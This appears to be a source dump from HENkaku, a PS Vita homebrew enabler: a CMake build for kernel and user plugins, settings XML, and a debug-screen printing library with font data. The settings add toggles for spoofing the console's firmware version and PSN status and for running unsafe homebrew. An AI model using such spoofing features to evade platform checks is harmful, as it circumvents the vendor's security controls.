  5 |     set(CMAKE_TOOLCHAIN_FILE "$ENV{VITASDK}/share/vita.toolchain.cmake" CACHE PATH "toolchain file")
  6 |   else()
  7 |     message(FATAL_ERROR "Please define VITASDK to point to your SDK path!")
  8 |   endif()
  9 | endif()
 10 | 
 11 | project(HENkaku)
 12 | include("${VITASDK}/share/vita.cmake" REQUIRED)
 13 | 
 14 | set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -Wl,-q -Wall -fshort-wchar -O3 -std=gnu99")
 15 | set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -std=c++11 -fno-rtti -fno-exceptions")
 16 | 
 17 | include_directories(
 18 | )
 19 | 
 20 | link_directories(
 21 |   ${CMAKE_CURRENT_BINARY_DIR}/henkaku-stubs
 22 | )
 23 | 
 24 | if (NOT ${RELEASE})
 25 |   add_definitions(-DENABLE_LOGGING)
 26 | endif()
 27 | 
 28 | # Builds
 29 | function(ADD_RESOURCES out_var)
 30 |   set(result)
 31 |   foreach(in_f ${ARGN})
 32 |     set(out_f "${CMAKE_CURRENT_BINARY_DIR}/${in_f}.o")
 33 |     get_filename_component(out_dir ${out_f} DIRECTORY)
 34 |     add_custom_command(OUTPUT ${out_f}
 35 |       COMMAND ${CMAKE_COMMAND} -E make_directory ${out_dir}
 36 |       COMMAND ${CMAKE_LINKER} -r -b binary -o ${out_f} ${in_f}
 37 |       DEPENDS ${in_f}
 38 |       WORKING_DIRECTORY ${CMAKE_SOURCE_DIR}
 39 |       COMMENT "Building resource ${out_f}"
 40 |       VERBATIM
 41 |       )
 42 |     list(APPEND result ${out_f})
 43 |   endforeach()
 44 |   set(${out_var} "${result}" PARENT_SCOPE)
 45 | endfunction()
 46 | 
 47 | file(GLOB res_files RELATIVE ${CMAKE_SOURCE_DIR} *.xml)
 48 | add_resources(xml_res ${res_files})
 49 | 
 50 | add_executable(user
 51 |   ${xml_res}
 52 |   user.c
 53 | )
 54 | 
 55 | add_executable(kernel
 56 |   kernel.c
 57 | )
 58 | 
 59 | target_link_libraries(user
 60 |   taihen_stub
 61 |   HENkaku_stub
 62 |   SceLibKernel_stub
 63 |   SceIofilemgr_stub
 64 |   SceRegistryMgr_stub
 65 |   ScePower_stub
 66 |   SceVshBridge_stub
 67 | )
 68 | 
 69 | target_link_libraries(kernel
 70 |   gcc
 71 |   taihenForKernel_stub
 72 |   SceSysmemForDriver_stub
 73 |   SceSysclibForDriver_stub
 74 |   SceIofilemgrForDriver_stub
 75 |   SceDebugForDriver_stub
 76 |   SceThreadmgrForDriver_stub
 77 | )
 78 | 
 79 | add_dependencies(user henkaku-stubs)
 80 | 
 81 | set_target_properties(kernel
 82 |   PROPERTIES LINK_FLAGS "-nostdlib"
 83 |   COMPILE_FLAGS "-D__VITA_KERNEL__"
 84 | )
 85 | 
 86 | set_target_properties(user
 87 |   PROPERTIES LINK_FLAGS "-nostdlib"
 88 | )
 89 | 
 90 | vita_create_self(henkaku.skprx kernel
 91 |   UNSAFE
 92 |   CONFIG ${CMAKE_SOURCE_DIR}/kernel.yml
 93 | )
 94 | vita_create_stubs(henkaku-stubs kernel ${CMAKE_SOURCE_DIR}/kernel.yml
 95 |   KERNEL
 96 | )
 97 | vita_create_self(henkaku.suprx user
 98 |   UNSAFE
 99 |   CONFIG ${CMAKE_SOURCE_DIR}/user.yml
100 | )
101 | 
102 | install(DIRECTORY ${CMAKE_BINARY_DIR}/henkaku-stubs/
103 |   DESTINATION lib
104 |   FILES_MATCHING PATTERN "*.a"
105 | )
106 | 


--------------------------------------------------------------------------------
/plugin/henkaku_settings.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <system_settings version="1.0" plugin="idu_settings_plugin">
 3 | 
 4 |   <setting_list id="henkaku_settings" title="msg_henkaku_settings" icon="tex_spanner">
 5 | 
 6 |     <!-- Enable PSN Spoofing -->
 7 |     <toggle_switch id="id_enable_psn_spoofing"
 8 |                    title="msg_enable_psn_spoofing"
 9 |                    icon="tex_spanner"
10 |                    key="/CONFIG/HENKAKU/enable_psn_spoofing"/>
11 | 
12 |     <!-- Enable Unsafe Homebrew -->
13 |     <toggle_switch id="id_enable_unsafe_homebrew"
14 |                    title="msg_enable_unsafe_homebrew"
15 |                    hint="msg_unsafe_homebrew_description"
16 |                    icon="tex_spanner"
17 |                    key="/CONFIG/HENKAKU/enable_unsafe_homebrew"/>
18 | 
19 |     <!-- Enable PSN Spoofing -->
20 |     <toggle_switch id="id_enable_version_spoofing"
21 |                    title="msg_enable_version_spoofing"
22 |                    icon="tex_spanner"
23 |                    key="/CONFIG/HENKAKU/enable_version_spoofing"/>
24 | 
25 |     <!-- Spoofed version -->
26 |     <text_field id="id_spoofed_version"
27 |                 title="msg_spoofed_version"
28 |                 icon="tex_spanner"
29 |                 key="/CONFIG/HENKAKU/spoofed_version"
30 |                 keyboard_type="extended_numeral"
31 |                 max_length="5"/>
32 | 
33 |     <!-- ○ Button Behavior -->
34 |     <list id="id_button_behavior"
35 |           title="msg_button_behavior"
36 |           icon="tex_spanner"
37 |           key="/CONFIG/SYSTEM/button_assign">
38 |       <list_item id="id_button_behavior_enter"
39 |                  title="msg_button_enter"
40 |                  value="0"/>
41 |       <list_item id="id_button_behavior_cancel"
42 |                  title="msg_button_cancel"
43 |                  value="1"/>
44 |     </list>
45 | 
46 |     <!-- Content Downloader -->
47 |     <setting_list id="download"
48 |                   title="msg_content_downloader"
49 |                   icon="tex_spanner"
50 |                   navi_left="download_footer_cancel"
51 |                   navi_center="download_footer_select_all"
52 |                   navi_right="download_footer_exec">
53 |       <user_custom id="download_dummy"/>
54 |     </setting_list>
55 | 
56 |     <!-- Unlink Memory Card -->
57 |     <button id="id_unlink_memory_card"
58 |             title="msg_unlink_memory_card"
59 |             icon="tex_spanner"
60 |             success_dialog_message="msg_unlink_memory_card_success"
61 |             error_dialog_message="msg_unlink_memory_card_error"/>
62 | 
63 |     <!-- Reload taiHEN config.txt -->
64 |     <button id="id_reload_taihen_config"
65 |             title="msg_reload_taihen_config"
66 |             icon="tex_spanner"
67 |             success_dialog_message="msg_reload_taihen_config_success"/>
68 | 
69 |     <!-- Reboot device -->
70 |     <button id="id_reboot_device"
71 |             title="msg_reboot_device"
72 |             icon="tex_spanner"/>
73 | 
74 |   </setting_list>
75 | </system_settings>


--------------------------------------------------------------------------------
/plugin/system_settings.xml:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <system_settings version="1.0" plugin="system_settings_plugin">
  3 | 
  4 |   <!-- システム設定 トップメニュー -->
  5 |   <setting_list id="system_settings" 
  6 |                 title="msg_settings">
  7 | 
  8 |     <!-- Sandbox Settings -->
  9 |     <link id="sandbox_settings"
 10 |           file="sandbox_settings.xml"
 11 |           title="Sandbox Settings"
 12 |           icon="tex_spanner"/>
 13 | 
 14 |     <!-- フレームワークテスト -->
 15 |     <link id="framework_test"
 16 |       file="framework_test.xml"
 17 |       title="フレームワークテスト"
 18 |       icon="tex_spanner"/>
 19 | 
 20 |     <!-- テスト用と本番用でなんとなく分ける -->
 21 |     <spacer id="spacer0" />
 22 | 
 23 |     <!-- 機内モード -->
 24 |     <toggle_switch id="flight_mode"
 25 |                    key="/CONFIG/SYSTEM/flight_mode"
 26 |                    title="msg_airplanemode"
 27 |                    icon="tex_flight_mode"
 28 |                    hint="msg_airplanemode_info" />
 29 | 
 30 |     <!-- HENkaku Settings -->
 31 |     <link id="henkaku_settings"
 32 |             title="msg_henkaku_settings"
 33 |             icon="tex_spanner"
 34 |             file="idu_settings.xml"
 35 |             />
 36 |     
 37 |     <!-- ネットワーク設定 -->
 38 |     <link id="network_settings"
 39 |           title="msg_network"
 40 |           icon="tex_network"
 41 |           file="network_settings.xml" />
 42 | 
 43 |     <!-- PlayStation®Network設定 -->
 44 |     <link id="psn_settings"
 45 |           file="psn_settings.xml"
 46 |           title="msg_psn"
 47 |           icon="tex_psn"/>
 48 | 
 49 |     <!-- 周辺機器設定 -->
 50 |     <link id="peripherals_settings"
 51 |           file="peripherals_settings.xml"
 52 |           title="msg_accessories"
 53 |           icon="tex_accessories"/>
 54 | 
 55 |     <!-- お知らせ -->
 56 |     <link id="notification_settings"
 57 |           file="notification_settings.xml"
 58 |           title="msg_notifications"
 59 |           icon="tex_notification"/>
 60 | 
 61 |     <!-- サウンド＆ディスプレイ -->
 62 |     <link id="sound_settings"
 63 |           file="sound_settings.xml"
 64 |           title="msg_sound_display"
 65 |           icon="tex_sound_display"/>
 66 | 
 67 |     <!-- テーマ -->
 68 |     <link id="theme_settings"
 69 |           file="theme_settings.xml"
 70 |           title="msg_theme_background"
 71 |           icon="tex_themes"/>
 72 | 
 73 |     <!-- 位置データ -->
 74 |     <link id="location_settings"
 75 |           file="location_settings.xml"
 76 |           title="msg_location_data"
 77 |           icon="tex_location_information_service"/>
 78 | 
 79 |     <!-- セキュリティー -->
 80 |     <link id="security_settings"
 81 |           file="security_settings.xml"
 82 |           title="msg_pc_security"
 83 |           icon="tex_security"/>
 84 | 
 85 |     <!-- 日付＆時刻 -->
 86 |     <link id="datetime_settings"
 87 |           file="datetime_settings.xml"
 88 |           title="msg_date_time"
 89 |           icon="tex_time_date"/>
 90 | 
 91 |     <!-- 言語 -->
 92 |     <link id="language_settings"
 93 |           file="language_settings.xml"
 94 |           title="msg_language"
 95 |           icon="tex_language"/>
 96 | 
 97 |     <!-- アクセシビリティ -->
 98 |     <link id="accessibility"
 99 |           file="accessibility.xml"
100 |           title="msg_accessibility"
101 |           icon="tex_accessibility"/>
102 | 
103 |     <!-- システム -->
104 |     <link id="console_info"
105 |           file="console_info.xml"
106 |           title="msg_system"
107 |           icon="tex_system"/>
108 | 
109 |     <!-- 初期化 -->
110 |     <link id="reset"
111 |           file="reset.xml"
112 |           title="msg_format_restore"
113 |           icon="tex_format"/>
114 | 
115 |     <!-- 省電力設定 -->
116 |     <link id="powersave_settings"
117 |           file="powersave_settings.xml"
118 |           title="msg_power_saving_settings"
119 |           icon="tex_power_save"/>
120 | 
121 |     <!-- IDU Settings -->
122 |     <link id="idu_settings"
123 |           file="idu_settings.xml"
124 |           title="IDU Settings"
125 |           icon="tex_spanner"/>
126 | 
127 |     <!-- ★Debug Settings -->
128 |     <link id="debug_settings"
129 |           file="debug_settings.xml"
130 |           title="★Debug Settings"
131 |           icon="tex_spanner"/>
132 | 
133 |   </setting_list>
134 | 
135 | </system_settings>
136 | 


--------------------------------------------------------------------------------
/bootstrap/pspdebug.h:
--------------------------------------------------------------------------------
  1 | /*
  2 |  * PSP Software Development Kit - http://www.psvdev.org
  3 |  * -----------------------------------------------------------------------
  4 |  * Licensed under the BSD license, see LICENSE in PSPSDK root for details.
  5 |  *
  6 |  * pspdebug.h - Prototypes for the psvDebug library
  7 |  *
  8 |  * Copyright (c) 2005 Marcus R. Brown <mrbrown@ocgnet.org>
  9 |  * Copyright (c) 2005 James Forshaw <tyranid@gmail.com>
 10 |  * Copyright (c) 2005 John Kelley <ps2dev@kelley.ca>
 11 |  *
 12 |  * $Id: pspdebug.h 2450 2009-01-04 23:53:02Z oopo $
 13 |  */
 14 | #ifndef __DEBUG_H__
 15 | #define __DEBUG_H__
 16 | 
 17 | #ifdef __cplusplus
 18 | extern "C" {
 19 | #endif
 20 | 
 21 | /** @defgroup Debug Debug Utility Library */
 22 | 
 23 | /** @addtogroup Debug */
 24 | /*@{*/
 25 | 
 26 | /** 
 27 |   * Initialise the debug screen
 28 |   */
 29 | void psvDebugScreenInit(void);
 30 | 
 31 | /**
 32 |  * Extended debug screen init
 33 |  *
 34 |  * @param vram_base - Base address of frame buffer, if NULL then sets a default
 35 |  * @param mode - Colour mode
 36 |  * @param setup - Setup the screen if 1
 37 |  */
 38 | void psvDebugScreenInitEx(void *vram_base, int mode, int setup);
 39 | 
 40 | /**
 41 |   * Do a printf to the debug screen.
 42 |   *
 43 |   * @param fmt - Format string to print
 44 |   * @param ... - Arguments
 45 |   */
 46 | void psvDebugScreenPrintf(const char *fmt, ...) __attribute__((format(printf,1,2)));
 47 | 
 48 | /**
 49 |  * Enable or disable background colour writing (defaults to enabled)
 50 |  * 
 51 |  * @param enable - Set 1 to to enable background color, 0 for disable
 52 |  */
 53 | void psvDebugScreenEnableBackColor(int enable);
 54 | 
 55 | /** 
 56 |   * Set the background color for the text
 57 |   * @note To reset the entire screens bg colour you need to call psvDebugScreenClear
 58 |   *
 59 |   * @param color - A 32bit RGB colour
 60 |   */
 61 | void psvDebugScreenSetBackColor(uint32_t color);
 62 | 
 63 | /**
 64 |   * Set the text color 
 65 |   *
 66 |   * @param color - A 32 bit RGB color
 67 |   */
 68 | void psvDebugScreenSetTextColor(uint32_t color);
 69 | 
 70 | /**
 71 |  * Set the color mode (you must have switched the frame buffer appropriately)
 72 |  *
 73 |  * @param mode - Color mode
 74 |  */
 75 | void psvDebugScreenSetColorMode(int mode);
 76 | 
 77 | /** 
 78 |   * Draw a single character to the screen.
 79 |   *
 80 |   * @param x - The x co-ordinate to draw to (pixel units)
 81 |   * @param y - The y co-ordinate to draw to (pixel units)
 82 |   * @param color - The text color to draw
 83 |   * @param ch - The character to draw
 84 |   */
 85 | void psvDebugScreenPutChar(int x, int y, uint32_t color, uint8_t ch);
 86 | 
 87 | /**
 88 |   * Set the current X and Y co-ordinate for the screen (in character units)
 89 |   */
 90 | void psvDebugScreenSetXY(int x, int y);
 91 | 
 92 | /**
 93 |   * Set the video ram offset used for the screen
 94 |   *
 95 |   * @param offset - Offset in bytes
 96 |   */
 97 | void psvDebugScreenSetOffset(int offset);
 98 | 
 99 | /**
100 |  * Set the video ram base used for the screen
101 |  *
102 |  * @param base - Base address in bytes
103 |  */
104 | void psvDebugScreenSetBase(uint32_t* base);
105 | 
106 | /** 
107 |   * Get the current X co-ordinate (in character units)
108 |   *
109 |   * @return The X co-ordinate
110 |   */
111 | int psvDebugScreenGetX(void);
112 | 
113 | /** 
114 |   * Get the current Y co-ordinate (in character units)
115 |   *
116 |   * @return The Y co-ordinate
117 |   */
118 | int psvDebugScreenGetY(void);
119 | 
120 | /**
121 |   * Clear the debug screen.
122 |   */
123 | void psvDebugScreenClear(void);
124 | 
125 | /**
126 |   * Print non-nul terminated strings.
127 |   * 
128 |   * @param buff - Buffer containing the text.
129 |   * @param size - Size of the data
130 |   *
131 |   * @return The number of characters written
132 |   */
133 | int psvDebugScreenPrintData(const char *buff, int size);
134 | 
135 | /**
136 |  * Print a string
137 |  *
138 |  * @param str - String
139 |  *
140 |  * @return The number of characters written
141 |  */
142 | int psvDebugScreenPuts(const char *str);
143 | 
144 | /**
145 |   * Get a MIPS stack trace (might work :P)
146 |   *
147 |   * @param results - List of points to store the results of the trace, (up to max)
148 |   * @param max - Maximum number of back traces
149 |   *
150 |   * @return The number of frames stored in results.
151 | */
152 | int psvDebugGetStackTrace(unsigned int* results, int max);
153 | 
154 | /**
155 |  * Enable the clear line function that allows debug to clear the screen
156 | */
157 | void psvDebugScreenClearLineEnable(void);
158 | 
159 | /**
160 |  * Disable the clear line function that causes flicker on constant refreshes
161 | */
162 | void psvDebugScreenClearLineDisable(void);
163 | 
164 | /*@}*/
165 | 
166 | #ifdef __cplusplus
167 | }
168 | #endif
169 | 
170 | #endif


--------------------------------------------------------------------------------
/bootstrap/scr_printf.c:
--------------------------------------------------------------------------------
  1 | /*
  2 |  * PSP Software Development Kit - http://www.psvdev.org
  3 |  * -----------------------------------------------------------------------
  4 |  * Licensed under the BSD license, see LICENSE in PSPSDK root for details.
  5 |  *
  6 |  * scr_printf.c - Debug screen functions.
  7 |  *
  8 |  * Copyright (c) 2005 Marcus R. Brown <mrbrown@ocgnet.org>
  9 |  * Copyright (c) 2005 James Forshaw <tyranid@gmail.com>
 10 |  * Copyright (c) 2005 John Kelley <ps2dev@kelley.ca>
 11 |  *
 12 |  * $Id: scr_printf.c 2450 2009-01-04 23:53:02Z oopo $
 13 |  */
 14 | #include <vitasdk.h>
 15 | #include <stdio.h>
 16 | #include <stdarg.h>
 17 | #include <string.h>
 18 | 
 19 | #include "pspdebug.h"
 20 | 
 21 | #define PSV_SCREEN_WIDTH 960
 22 | #define PSV_SCREEN_HEIGHT 544
 23 | #define PSV_LINE_SIZE 960
 24 | 
 25 | /* baseado nas libs do Duke... */
 26 | 
 27 | void  _psvDebugScreenClearLine( int Y);
 28 | 
 29 | static int X = 0, Y = 0;
 30 | static int MX=68, MY=34;
 31 | static uint32_t bg_col = 0, fg_col = 0xFFFFFFFF;
 32 | static int bg_enable = 1;
 33 | static void* g_vram_base = NULL;
 34 | static int g_vram_offset = 0;
 35 | static int g_vram_mode = SCE_DISPLAY_PIXELFORMAT_A8B8G8R8;
 36 | static int init = 0;
 37 | static int clearline_en = 1;
 38 | 
 39 | static void clear_screen_32(uint32_t color)
 40 | {
 41 |   int x;
 42 |   uint32_t *vram = g_vram_base;
 43 |   vram +=  (g_vram_offset>>2);
 44 | 
 45 |   for(x = 0; x < (PSV_LINE_SIZE * PSV_SCREEN_HEIGHT); x++)
 46 |   {
 47 |     *vram++ = color; 
 48 |   }
 49 | }
 50 | 
 51 | static void clear_screen(uint32_t color)
 52 | {
 53 |   if(g_vram_mode == SCE_DISPLAY_PIXELFORMAT_A8B8G8R8)
 54 |   {
 55 |     clear_screen_32(color);
 56 |   }
 57 | }
 58 | 
 59 | #define ALIGN(x, align) (((x) + ((align) - 1)) & ~((align) - 1))
 60 | 
 61 | void psvDebugScreenInitEx(void *vram_base, int mode, int setup)
 62 | {
 63 |   switch(mode)
 64 |   {
 65 |     case SCE_DISPLAY_PIXELFORMAT_A8B8G8R8:
 66 |       break;
 67 |     default: mode = SCE_DISPLAY_PIXELFORMAT_A8B8G8R8;
 68 |   };
 69 | 
 70 |   X = Y = 0;
 71 |   /* Place vram in uncached memory */
 72 |   if(vram_base == NULL)
 73 |   {
 74 |     int block = sceKernelAllocMemBlock("", SCE_KERNEL_MEMBLOCK_TYPE_USER_CDRAM_RW, ALIGN(PSV_LINE_SIZE * PSV_SCREEN_HEIGHT * 4, 256 * 1024), NULL);
 75 |     sceKernelGetMemBlockBase(block, &vram_base);
 76 |   }
 77 |   g_vram_base = vram_base;
 78 |   g_vram_offset = 0;
 79 |   g_vram_mode = mode;
 80 |   if(setup)
 81 |   {
 82 |     SceDisplayFrameBuf framebuf;
 83 |     framebuf.size = sizeof(SceDisplayFrameBuf);
 84 |     framebuf.base = (void *)g_vram_base;
 85 |     framebuf.pitch = PSV_LINE_SIZE;
 86 |     framebuf.width = PSV_SCREEN_WIDTH;
 87 |     framebuf.height = PSV_SCREEN_HEIGHT;
 88 |     framebuf.pixelformat = mode;
 89 |     sceDisplaySetFrameBuf(&framebuf, 1);
 90 |   }
 91 |   clear_screen(bg_col);
 92 |   init = 1;
 93 | }
 94 | 
 95 | void psvDebugScreenInit()
 96 | {
 97 |   X = Y = 0;
 98 |   psvDebugScreenInitEx(NULL, SCE_DISPLAY_PIXELFORMAT_A8B8G8R8, 1);
 99 | }
100 | 
101 | void psvDebugScreenEnableBackColor(int enable) 
102 | {
103 |   bg_enable = enable;
104 | }
105 | 
106 | void psvDebugScreenSetBackColor(uint32_t colour)
107 | {
108 |   bg_col = colour;
109 | }
110 | 
111 | void psvDebugScreenSetTextColor(uint32_t colour)
112 | {
113 |   fg_col = colour;
114 | }
115 | 
116 | void psvDebugScreenSetColorMode(int mode)
117 | {
118 |   switch(mode)
119 |   {
120 |     case SCE_DISPLAY_PIXELFORMAT_A8B8G8R8:
121 |       break;
122 |     default: mode = SCE_DISPLAY_PIXELFORMAT_A8B8G8R8;
123 |   };
124 | 
125 |   g_vram_mode = mode;
126 | }
127 | 
128 | int psvDebugScreenGetX()
129 | {
130 |   return X;
131 | }
132 | 
133 | int psvDebugScreenGetY()
134 | {
135 |   return Y;
136 | }
137 | 
138 | void psvDebugScreenClear()
139 | {
140 |   int y;
141 | 
142 |   if(!init)
143 |   {
144 |     return;
145 |   }
146 | 
147 |   for(y=0;y<MY;y++)
148 |   {
149 |     _psvDebugScreenClearLine(y);
150 |   }
151 | 
152 |   psvDebugScreenSetXY(0,0);
153 |   clear_screen(bg_col);
154 | }
155 | 
156 | void psvDebugScreenSetXY(int x, int y)
157 | {
158 |   if( x<MX && x>=0 ) X=x;
159 |   if( y<MY && y>=0 ) Y=y;
160 | }
161 | 
162 | void psvDebugScreenSetOffset(int offset)
163 | {
164 |   g_vram_offset = offset;
165 | }
166 | 
167 | void psvDebugScreenSetBase(uint32_t* base)
168 | {
169 |   g_vram_base = base;
170 | }
171 | 
172 | extern uint8_t msx[];
173 | 
174 | static void debug_put_char_32(int x, int y, uint32_t color, uint32_t bgc, uint8_t ch)
175 | {
176 |   int   i,j, l;
177 |   uint8_t  *font;
178 |   uint32_t *vram_ptr;
179 |   uint32_t *vram;
180 | 
181 |   if(!init)
182 |   {
183 |     return;
184 |   }
185 | 
186 |   x *= 2;
187 |   y *= 2;
188 | 
189 |   vram = g_vram_base;
190 |   vram += (g_vram_offset >> 2) + x;
191 |   vram += (y * PSV_LINE_SIZE);
192 | 
193 |   font = &msx[ (int)ch * 8];
194 |   for (i=l=0; i < 8; i++, l+= 8, font++)
195 |   {
196 |     vram_ptr  = vram;
197 |     for (j=0; j < 8; j++)
198 |     {
199 |       if ((*font & (128 >> j))) {
200 |         vram_ptr[0] = color; 
201 |         vram_ptr[1] = color; 
202 |         vram_ptr[0 + PSV_LINE_SIZE] = color; 
203 |         vram_ptr[1 + PSV_LINE_SIZE] = color; 
204 |       } else if(bg_enable) {
205 |         vram_ptr[0] = bgc; 
206 |         vram_ptr[1] = bgc; 
207 |         vram_ptr[0 + PSV_LINE_SIZE] = bgc; 
208 |         vram_ptr[1 + PSV_LINE_SIZE] = bgc; 
209 |       }
210 | 
211 |       vram_ptr += 2;
212 |     }
213 |     vram += 2 * PSV_LINE_SIZE;
214 |   }
215 | }
216 | 
217 | void
218 | psvDebugScreenPutChar( int x, int y, uint32_t color, uint8_t ch)
219 | {
220 |   if(g_vram_mode == SCE_DISPLAY_PIXELFORMAT_A8B8G8R8)
221 |   {
222 |     debug_put_char_32(x, y, color, bg_col, ch);
223 |   }
224 | }
225 | 
226 | void  _psvDebugScreenClearLine( int Y)
227 | {
228 |   if(clearline_en)
229 |   {
230 |     int i;
231 |     if(bg_enable)
232 |     {
233 |       for (i=0; i < MX; i++)
234 |       {
235 |         psvDebugScreenPutChar( i*7 , Y * 8, bg_col, 219);
236 |       }
237 |     }
238 |   }
239 |   return;
240 | }
241 | 
242 | void psvDebugScreenClearLineEnable(void)
243 | {
244 |   clearline_en = 1;
245 |   return;
246 | }
247 | 
248 | void psvDebugScreenClearLineDisable(void)
249 | {
250 |   clearline_en = 0;
251 |   return;
252 | }
253 | 
254 | /* Print non-nul terminated strings */
255 | int psvDebugScreenPrintData(const char *buff, int size)
256 | {
257 |   int i;
258 |   int j;
259 |   char c;
260 | 
261 |   if(!init)
262 |   {
263 |     return 0;
264 |   }
265 | 
266 |   for (i = 0; i < size; i++)
267 |   {
268 |     c = buff[i];
269 |     switch (c)
270 |     {
271 |       case '\r':
272 |             X = 0;
273 |             break;
274 |       case '\n':
275 |             X = 0;
276 |             Y ++;
277 |             if (Y == MY)
278 |               Y = 0;
279 |             _psvDebugScreenClearLine(Y);
280 |             break;
281 |       case '\t':
282 |             for (j = 0; j < 5; j++) {
283 |               psvDebugScreenPutChar( X*7 , Y * 8, fg_col, ' ');
284 |               X++;
285 |             }
286 |             break;
287 |       default:
288 |             psvDebugScreenPutChar( X*7 , Y * 8, fg_col, c);
289 |             X++;
290 |             if (X == MX)
291 |             {
292 |               X = 0;
293 |               Y++;
294 |               if (Y == MY)
295 |                 Y = 0;
296 |               _psvDebugScreenClearLine(Y);
297 |             }
298 |     }
299 |   }
300 | 
301 |   return i;
302 | }
303 | 
304 | int psvDebugScreenPuts(const char *str)
305 | {
306 |   return psvDebugScreenPrintData(str, sceClibStrnlen(str, 2048));
307 | }
308 | 
309 | void psvDebugScreenPrintf(const char *format, ...)
310 | {
311 |   va_list  opt;
312 |   char     buff[2048];
313 |   int    bufsz;
314 | 
315 |   va_start(opt, format);
316 |   bufsz = sceClibVsnprintf( buff, (size_t) sizeof(buff), format, opt);
317 |   (void) psvDebugScreenPrintData(buff, bufsz);
318 | }
319 | 


--------------------------------------------------------------------------------
/bootstrap/font.c:
--------------------------------------------------------------------------------
  1 | /*
  2 |  * PSP Software Development Kit - http://www.pspdev.org
  3 |  * -----------------------------------------------------------------------
  4 |  * Licensed under the BSD license, see LICENSE in PSPSDK root for details.
  5 |  *
  6 |  * font.c - Debug Font.
  7 |  *
  8 |  * Copyright (c) 2005 Marcus R. Brown <mrbrown@ocgnet.org>
  9 |  * Copyright (c) 2005 James Forshaw <tyranid@gmail.com>
 10 |  * Copyright (c) 2005 John Kelley <ps2dev@kelley.ca>
 11 |  *
 12 |  * $Id: font.c 540 2005-07-08 19:35:10Z warren $
 13 |  */
 14 | 
 15 | unsigned char msx[]=
 16 | "\x00\x00\x00\x00\x00\x00\x00\x00\x3c\x42\xa5\x81\xa5\x99\x42\x3c"
 17 | "\x3c\x7e\xdb\xff\xff\xdb\x66\x3c\x6c\xfe\xfe\xfe\x7c\x38\x10\x00"
 18 | "\x10\x38\x7c\xfe\x7c\x38\x10\x00\x10\x38\x54\xfe\x54\x10\x38\x00"
 19 | "\x10\x38\x7c\xfe\xfe\x10\x38\x00\x00\x00\x00\x30\x30\x00\x00\x00"
 20 | "\xff\xff\xff\xe7\xe7\xff\xff\xff\x38\x44\x82\x82\x82\x44\x38\x00"
 21 | "\xc7\xbb\x7d\x7d\x7d\xbb\xc7\xff\x0f\x03\x05\x79\x88\x88\x88\x70"
 22 | "\x38\x44\x44\x44\x38\x10\x7c\x10\x30\x28\x24\x24\x28\x20\xe0\xc0"
 23 | "\x3c\x24\x3c\x24\x24\xe4\xdc\x18\x10\x54\x38\xee\x38\x54\x10\x00"
 24 | "\x10\x10\x10\x7c\x10\x10\x10\x10\x10\x10\x10\xff\x00\x00\x00\x00"
 25 | "\x00\x00\x00\xff\x10\x10\x10\x10\x10\x10\x10\xf0\x10\x10\x10\x10"
 26 | "\x10\x10\x10\x1f\x10\x10\x10\x10\x10\x10\x10\xff\x10\x10\x10\x10"
 27 | "\x10\x10\x10\x10\x10\x10\x10\x10\x00\x00\x00\xff\x00\x00\x00\x00"
 28 | "\x00\x00\x00\x1f\x10\x10\x10\x10\x00\x00\x00\xf0\x10\x10\x10\x10"
 29 | "\x10\x10\x10\x1f\x00\x00\x00\x00\x10\x10\x10\xf0\x00\x00\x00\x00"
 30 | "\x81\x42\x24\x18\x18\x24\x42\x81\x01\x02\x04\x08\x10\x20\x40\x80"
 31 | "\x80\x40\x20\x10\x08\x04\x02\x01\x00\x10\x10\xff\x10\x10\x00\x00"
 32 | "\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x20\x20\x00\x00\x20\x00"
 33 | "\x50\x50\x50\x00\x00\x00\x00\x00\x50\x50\xf8\x50\xf8\x50\x50\x00"
 34 | "\x20\x78\xa0\x70\x28\xf0\x20\x00\xc0\xc8\x10\x20\x40\x98\x18\x00"
 35 | "\x40\xa0\x40\xa8\x90\x98\x60\x00\x10\x20\x40\x00\x00\x00\x00\x00"
 36 | "\x10\x20\x40\x40\x40\x20\x10\x00\x40\x20\x10\x10\x10\x20\x40\x00"
 37 | "\x20\xa8\x70\x20\x70\xa8\x20\x00\x00\x20\x20\xf8\x20\x20\x00\x00"
 38 | "\x00\x00\x00\x00\x00\x20\x20\x40\x00\x00\x00\x78\x00\x00\x00\x00"
 39 | "\x00\x00\x00\x00\x00\x60\x60\x00\x00\x00\x08\x10\x20\x40\x80\x00"
 40 | "\x70\x88\x98\xa8\xc8\x88\x70\x00\x20\x60\xa0\x20\x20\x20\xf8\x00"
 41 | "\x70\x88\x08\x10\x60\x80\xf8\x00\x70\x88\x08\x30\x08\x88\x70\x00"
 42 | "\x10\x30\x50\x90\xf8\x10\x10\x00\xf8\x80\xe0\x10\x08\x10\xe0\x00"
 43 | "\x30\x40\x80\xf0\x88\x88\x70\x00\xf8\x88\x10\x20\x20\x20\x20\x00"
 44 | "\x70\x88\x88\x70\x88\x88\x70\x00\x70\x88\x88\x78\x08\x10\x60\x00"
 45 | "\x00\x00\x20\x00\x00\x20\x00\x00\x00\x00\x20\x00\x00\x20\x20\x40"
 46 | "\x18\x30\x60\xc0\x60\x30\x18\x00\x00\x00\xf8\x00\xf8\x00\x00\x00"
 47 | "\xc0\x60\x30\x18\x30\x60\xc0\x00\x70\x88\x08\x10\x20\x00\x20\x00"
 48 | "\x70\x88\x08\x68\xa8\xa8\x70\x00\x20\x50\x88\x88\xf8\x88\x88\x00"
 49 | "\xf0\x48\x48\x70\x48\x48\xf0\x00\x30\x48\x80\x80\x80\x48\x30\x00"
 50 | "\xe0\x50\x48\x48\x48\x50\xe0\x00\xf8\x80\x80\xf0\x80\x80\xf8\x00"
 51 | "\xf8\x80\x80\xf0\x80\x80\x80\x00\x70\x88\x80\xb8\x88\x88\x70\x00"
 52 | "\x88\x88\x88\xf8\x88\x88\x88\x00\x70\x20\x20\x20\x20\x20\x70\x00"
 53 | "\x38\x10\x10\x10\x90\x90\x60\x00\x88\x90\xa0\xc0\xa0\x90\x88\x00"
 54 | "\x80\x80\x80\x80\x80\x80\xf8\x00\x88\xd8\xa8\xa8\x88\x88\x88\x00"
 55 | "\x88\xc8\xc8\xa8\x98\x98\x88\x00\x70\x88\x88\x88\x88\x88\x70\x00"
 56 | "\xf0\x88\x88\xf0\x80\x80\x80\x00\x70\x88\x88\x88\xa8\x90\x68\x00"
